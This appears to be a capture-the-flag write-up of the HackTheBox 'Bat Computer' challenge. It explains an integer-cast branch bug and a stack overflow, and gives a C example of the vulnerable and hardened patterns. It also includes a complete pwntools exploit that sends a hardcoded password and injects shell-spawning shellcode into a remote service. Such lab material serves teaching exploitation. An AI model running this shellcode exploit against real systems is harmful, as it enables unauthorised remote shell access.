We covered a buffer overflow scenario in which a variable was declared as an unsigned integer and then cast to unsigned long (ulong). This let us send '-1' as input for that variable, which redirected the program's execution flow into an if statement containing a snippet where a 96-byte name variable accepts unrestricted input from the user, resulting in a segmentation fault. We calculated the offset using pwndbg with Python and built the final exploit. This was part of HackTheBox Bat Computer | Intro to binary exploitation.
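The integer handling bug described above, as an added C example (a hypothetical reconstruction of the bug class, not the challenge binary's code): a value read into an unsigned int and widened to unsigned long turns '-1' into a huge number that takes the branch, shown next to a parse that rejects signed input and a bounded copy into the 96-byte name buffer.

```c
#define _POSIX_C_SOURCE 200809L  /* for strnlen */
#include <errno.h>
#include <stdlib.h>
#include <string.h>

#define NAME_LEN 96  /* size of the name buffer mentioned in the write-up */

/* Hypothetical reconstruction of the bug class, not the challenge binary's code:
 * "-1" is converted through a signed parse into an unsigned int and then widened
 * to unsigned long, so the comparison sees 4294967295 and takes the branch. */
int vulnerable_branch(const char *input)
{
    unsigned int n = (unsigned int)atoi(input);  /* "-1" wraps to 4294967295 */
    unsigned long u = (unsigned long)n;          /* the ulong cast the write-up mentions */
    if (u > 100UL)
        return 1;  /* branch containing the unrestricted read */
    return 0;
}

/* Hardened parse: strtoul would silently accept a leading '-', so reject it
 * explicitly, then require the whole string to be digits and in range. */
int hardened_parse(const char *input, unsigned long *out)
{
    char *end;
    if (input[0] == '-' || input[0] == '+')
        return -1;
    errno = 0;
    unsigned long v = strtoul(input, &end, 10);
    if (errno == ERANGE || end == input || *end != '\0')
        return -1;
    *out = v;
    return 0;
}

/* Bounded copy into the 96-byte name buffer: never more than NAME_LEN - 1 bytes,
 * always NUL terminated. Returns the number of bytes copied. */
size_t safe_set_name(char name[NAME_LEN], const char *src)
{
    size_t n = strnlen(src, NAME_LEN - 1);
    memcpy(name, src, n);
    name[n] = '\0';
    return n;
}
```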

Buffer Overflow Techniques Notes

Exploit Code is below

##Beginning

```python
from pwn import *

context.binary = ELF('./batcomputer')

con = remote('157.245.39.76', 31662)

# Read the leaked stack address printed after "0x"
con.sendline(b'1')
con.recvuntil(b'0x')
stack_base = int("0x" + con.recv().decode('latin-1').split()[0], 16)
log.success(f'stack base: {hex(stack_base)}')

con.sendline(b'2')
con.sendline(b'b4tp@$$w0rd!')

payload = asm(shellcraft.popad() + shellcraft.sh())  # shellcode
payload += b'A' * (84 - len(payload))                # padding up to the saved return address
payload += p64(stack_base)                           # return address = leaked stack base

con.sendline(payload)

con.sendline(b'3')
con.interactive()
```

##Ending

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.
